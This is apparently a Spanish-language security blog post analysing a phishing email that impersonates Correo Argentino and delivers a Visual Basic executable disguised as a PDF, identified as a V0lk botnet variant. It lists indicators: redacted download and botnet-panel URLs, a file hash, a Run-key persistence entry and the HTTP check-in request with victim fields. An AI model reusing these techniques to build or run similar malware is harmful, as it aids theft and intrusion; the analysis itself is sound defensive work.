Ahora es el turno de Correo Argentino (variante Pamicard /Volk Botnet)
Después de la gran repercusión que causó, tanto en el sector informático como en los medios de comunicación, el famoso virus de las foto multas, me llegó una muestra de un correo electrónico acerca de un presunto “paquete nacional en tránsito”.
Este correo electrónico, presuntamente proveniente de la “Oficina de correos (Info@correoargentino.com.ar)” anuncia al receptor del mensaje que tiene un paquete en tránsito y que lo recibirá solo cuando se utilice el sistema de “Pago contrarembolso”, para poder continuar con el trámite, se ve un link de descarga de un supuesto documento en PDF, el cual en realidad está apuntando a la siguiente URL:
http://an[BLOQUEADO]ub.net/file/4qpg-detalles_seguimiento-pdf.exe
Como nota adicional, noten en la siguiente imagen como incrustan dentro del cuerpo del correo el logo de una empresa de seguridad afirmando que el correo está libre de virus
Como se puede ver, el recurso de destino de la solicitud es en realidad un archivo ejecutable, el cual al ser descargado, mantiene el ícono de un documento PDF, actuando la totalidad de esta primera parte del malware como elemento de ingeniería social.
Al descargar el binario pude comprobar estáticamente los siguientes datos:
Nombre del archivo: 4qpg-detalles_seguimiento-pdf.exe Tamaño del archivo: 53.248 bytes MD5: A28C8FE956A51741B1FBE9FC3CCDA1DC
Continuando un poco más con el análisis estático, me encuentro que el malware no cuenta con ningún tipo de compresión o cifrado del código (algo realmente raro en estos días) y hasta se puede deducir, observando un poco el binario, que está programado con Visual Basic 6.0 debido a su llamada a la librería MSVBVM60.DLL
Sin embargo, continuando la búsqueda dentro del binario, me sorprendí cuando vi que dentro de los strings del ejecutable, se podía leer donde se alojaba el proyecto original del mismo:
Como puede leerse dentro del binario, el proyecto se encontraba alojado en el perfil del usuario PA dentro de su escritorio, en una carpeta llamada vb6 Source, de hecho, el proyecto se llamaba originalmente Proyecto1.vbp. Más adelante dentro del binario, también podemos encontrar que el nombre original del archivo era: pamicard-botnet-test.exe.
Obviamente, ahí ya tenía un nickname para investigar. Continuando con el análisis estático, pude encontrar también strings que refieren código a V0lk, combinando estas dos cosas, pude deducir de sin la necesidad de ejecutar el código que nos encontramos ante una variante de malware que utiliza la herramienta “V0lk-Botnet 4.0”.
Ahora bien, ya entrando en la etapa de análisis dinámico (que implica la ejecución de la muestra en un entorno controlado) pude observar el siguiente comportamiento:
Al momento de la ejecución, se agregar un archivo de las siguientes características en el sistema:
Destino: %Windows%\csrcs.exe MD5: a28c8fe956a51741b1fbe9fc3ccda1dc
Agrega la siguiente rama de registro al sistema:
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\Run\Microsofts Dato: %Windows%\csrcs.exe Tipo: REG_SZ
Resuelve e intenta conectarse a la URL de la botnet en http://n[bloqueado]s.asia/priv8/bots.php y envía la siguiente información al la botnet registrando dentro de la red la nueva víctima:
User-Agent: 753cda8b05e32ef3b82e0ff947a4a936 Content-Type: application/x-www-form-urlencoded Accept-Language: zh-cn Content-Length: 46 Accept: */* Host: n[bloqueado]s.asia Connection: Keep-Alive name=Administrator so=Windows 2000 pasw= file= 0 = CreateMutexW( 12d34c, 0, RasPbFile )
Obviamente, al ingresar a la URL donde se conecta el malware puede observarse el panel de control de la botnet V0lk, la cual se atribuye a grupos del underground mexicano, sin embargo, investigando el nickname dentro de la muestra, puedo atribuirla a algún scriptkiddie español.
¿Te gustó este artículo?
Aún no hay trackbacks.